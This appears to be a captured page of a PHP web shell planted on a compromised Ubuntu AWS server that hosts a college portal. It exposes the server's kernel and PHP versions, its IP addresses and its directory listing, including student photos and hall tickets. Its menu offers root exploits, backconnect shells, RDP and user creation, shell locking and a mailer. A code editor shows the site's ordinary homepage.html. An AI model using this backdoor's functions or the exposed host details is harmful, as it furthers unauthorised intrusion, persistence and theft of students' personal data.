Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.144.4.50
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
oasis /
jssum /
[ HOME SHELL ]
Name
Size
Permission
Action
backup
[ DIR ]
drwxrwsr-x
halltickets
[ DIR ]
drwxrwsr-x
images
[ DIR ]
drwxrwsr-x
img
[ DIR ]
drwxrwsr-x
imported_files
[ DIR ]
drwxrwxrwx
misc_files
[ DIR ]
drwxrwsr-x
student_photos
[ DIR ]
drwxrwsr-x
study_material
[ DIR ]
drwxrwsr-x
teacher_photos
[ DIR ]
drwxrwsr-x
tmpphotos
[ DIR ]
drwxrwsr-x
upload
[ DIR ]
drwxrwsr-x
MainPage.html
29.53
KB
-rw-r--r--
collegeInfoPopup.html
4.35
KB
-rw-r--r--
flash.html
2.23
KB
-rw-r--r--
forgotpassword.html
3.38
KB
-rw-r--r--
homepage.html
4.15
KB
-rw-r--r--
index.html
9.92
KB
-rw-rw-r--
indexlogin.html
9.92
KB
-rw-rw-r--
indexlogin2.html
6.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : homepage.html
<script> /*$(document).ready(function () { $('#homedatepicker').datepicker({ onSelect: function(dateText, inst) { assignPlannerDate(dateText); }, onChangeMonthYear: function(year_id, month_id, inst) { month_code=(month_id<10)?"0"+month_id:month_id; getSavedEventDates(year_id,month_code); GetDashboardDetails(); }, dateFormat:'yy-mm-dd',changeMonth: true,changeYear: true,showButtonPanel: true }); }); */ $(document).ready(function () { GetDashboardDetails() }) function getSavedEventDates(year_id, month_code) { //var month_id=eval(parseInt($("#homedatepicker .ui-datepicker-month").val())+1); //month_code=(month_id<10)?"0"+month_id:month_id; //var year_id=$("#homedatepicker .ui-datepicker-year").val(); /* $.ajax({ type: "POST", data:"year_month="+year_id+month_code+"&user_id="+getCookie('user_id') , url: $host_url+"getSavedEventDates", success: function getSavedEventDatesResponce($responce) { $responce = eval('(' + $responce + ')'); if ($responce.error_code == 0) { jQuery.each($responce.data, function(k, v) { $("#homedatepicker_"+v['date_id']).addClass("ui-state-highlight"); }); } } }); */ } </script> <div class="homepage-maindiv"> <!-- <div class="page-info-header" id="page_info_header"><span id="parent_menu"></span><span id='display_module_name'></span></div> --> <div class="homepage-leftdiv"> <div class="Dash-board-home ui-widget ui-widget-content ui-corner-all ui-corner-all" style=" overflow-y: auto; overflow-x: hidden; height: 380px; padding: 5px; width: 600px; " > <div class="ui-widget-header ui-corner-all" style="height: 15px; padding: 2px" > Notice Board </div> <div id="college_message_board" style=" line-height: 18px; text-align: justify; font-size: 12px; padding: 10px 10px; " ></div> </div> <div style=" padding: 5px 5px; font-size: 18px; margin-top: 10px; margin-left: 20px; " > <span style="display: none" ><a href="#" onclick="enableUniversityCommunication()" >Communicate with University</a ></span > </div> <!-- Calender & notes div -- <div class="Calender-notes-div"> <div class='calender-div' style="display:none;"> <div id="homedatepicker"></div> </div> <div class='notes-div ui-widget ui-widget-content ui-corner-all' style="display:none;" align='center'> <div class='ui-widget-header ui-corner-all'> <table style="width:100%"> <tr> <td align="left"> Notes </td> <td align="right"> <a href="#" class='notes-header-name' onclick="updatePlannerNotes();"> Update | </a> <a href="#" class='notes-header-name' onclick="getnotesdetails();"> Cancel</a> </td> </tr> </table> </div> <textarea id='planner_area' cols="60" rows="11" style="border:0px;"></textarea> </div> --> </div> <!--message board div --> <div class="messageboard-div ui-widget ui-widget-content ui-corner-all" style="padding: 5px; width: 200px; height: 380px" > <div class="ui-widget-header ui-corner-all" style="height: 15px; padding: 2px" > Message Board </div> <div id="message_board_content" style=" height: 306px; overflow-y: auto; overflow-x: hidden; padding: 10px 5px; width: 190px; " ></div> </div> </div>
Close